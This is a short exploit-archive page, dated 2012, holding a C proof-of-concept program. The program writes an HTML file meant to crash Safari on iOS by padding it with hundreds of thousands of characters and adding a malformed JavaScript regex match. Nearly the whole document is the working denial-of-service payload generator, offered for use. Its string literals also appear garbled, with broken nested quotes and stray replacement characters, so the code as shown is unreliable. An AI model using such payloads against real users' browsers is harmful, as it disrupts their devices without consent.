Home / exploits Safari On iOS Denial Of Service
Posted on 09 June 2012
/*PoC for Safari crash discovered by Alberto Ortega @a0rtega, alberto[@]pentbox[.]net http://www.livehacking.com/category/vulnerability/apple-vulnerability/ This PoC written by Larry W. Cashdollar http://vapid.dhs.org @lcashdol This PoC creates an html file to be served out by a normal webserver. It seems the browsers begin to crash when the output size is 800000+. usage: ./safari_crash 800000 /var/www/html/crash.html */ #include <stdio.h> #include <stdlib.h> int main (int argc, char *argv[]) { int x = 0; FILE *fout; char *payload = "<html> <head><title>Crash Safari PoC"; char *payload2="</title></head> <script type="text/javascript"> var s = "PoC"; s.match("�"; char *payload3 = ""); </script> </html>�"; if (argc < 3) { printf ("Safari Crash PoC Please supply buffer length and filename. Ex :%s 800000 crash.html ", argv[0]); exit (0); } fout = fopen (argv[2], "w"); fprintf (fout, "%s", payload); fprintf (fout, "Size : %s x A",argv[1]); fprintf (fout,"%s",payload2); while (x < atoi (argv[1])) { fprintf (fout, "A"); x++; } fprintf (fout, "%s", payload3); fclose (fout); return (0); }
